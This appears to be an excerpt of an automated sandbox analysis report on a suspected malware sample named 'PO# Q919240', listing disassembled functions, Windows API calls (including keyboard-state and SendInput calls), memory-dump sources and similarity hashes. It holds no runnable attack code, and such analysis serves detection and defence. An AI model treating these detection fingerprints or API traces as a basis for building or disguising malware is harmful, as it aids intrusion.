                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                • _free.LIBCMT ref: 0041F71A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: AllocateHeap_free_malloc
                • String ID: [B
                • API String ID: 1020059152-632041663
                • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                Download Yara Rule
                APIs
                • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                • __calloc_crt.LIBCMT ref: 00413DB0
                • __getptd.LIBCMT ref: 00413DBD
                • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                • _free.LIBCMT ref: 00413E07
                • __dosmaperr.LIBCMT ref: 00413E12
                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                • String ID:
                • API String ID: 155776804-0
                • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                  • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                • String ID:
                • API String ID: 1957940570-0
                • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                Function 00413D1A Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                Download Yara Rule
                APIs
                • ___set_flsgetvalue.LIBCMT ref: 00413D20
                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                • ExitThread.KERNEL32 ref: 00413D4E
                • GetCurrentThreadId.KERNEL32 ref: 00413D54
                • __freefls@4.LIBCMT ref: 00413D74
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                • String ID:
                • API String ID: 259663610-0
                • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                Download Yara Rule
                APIs
                • GetClientRect.USER32(?,?), ref: 004302E6
                • GetWindowRect.USER32(00000000,?), ref: 00430316
                • GetClientRect.USER32(?,?), ref: 00430364
                • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                • GetWindowRect.USER32(?,?), ref: 004303C3
                • ScreenToClient.USER32(?,?), ref: 004303EC
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Rect$Client$Window$MetricsScreenSystem
                • String ID:
                • API String ID: 3220332590-0
                • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _malloc_wcslen$_strcat_wcscpy
                • String ID:
                • API String ID: 1612042205-0
                • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove_strncmp
                • String ID: >$U$\
                • API String ID: 2666721431-237099441
                • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                Download Yara Rule
                APIs
                • GetKeyboardState.USER32(?), ref: 0044C570
                • SetKeyboardState.USER32(00000080), ref: 0044C594
                • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessagePost$KeyboardState$InputSend
                • String ID:
                • API String ID: 2221674350-0
                • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _wcscpy$_wcscat
                • String ID:
                • API String ID: 2037614760-0
                • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Variant$Copy$AllocClearErrorLastString
                • String ID:
                • API String ID: 960795272-0
                • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                Download Yara Rule
                APIs
                • BeginPaint.USER32(00000000,?), ref: 00447BDF
                • GetWindowRect.USER32(?,?), ref: 00447C5D
                • ScreenToClient.USER32(?,?), ref: 00447C7B
                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                • EndPaint.USER32(?,?), ref: 00447D13
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                • String ID:
                • API String ID: 4189319755-0
                • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend$LongWindow$InvalidateRect
                • String ID:
                • API String ID: 1976402638-0
                • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                Download Yara Rule
                APIs
                • ShowWindow.USER32(?,00000000), ref: 00440A8A
                • EnableWindow.USER32(?,00000000), ref: 00440AAF
                • ShowWindow.USER32(?,00000000), ref: 00440B18
                • ShowWindow.USER32(?,00000004), ref: 00440B2B
                • EnableWindow.USER32(?,00000001), ref: 00440B50
                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$Show$Enable$MessageSend
                • String ID:
                • API String ID: 642888154-0
                • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Variant$Copy$ClearErrorLast
                • String ID: NULL Pointer assignment$Not an Object type
                • API String ID: 2487901850-572801152
                • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                • EnableWindow.USER32(?,00000001), ref: 00448B72
                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                • EnableWindow.USER32(?,00000001), ref: 00448C09
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$Enable$Show$MessageSend
                • String ID:
                • API String ID: 1871949834-0
                • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
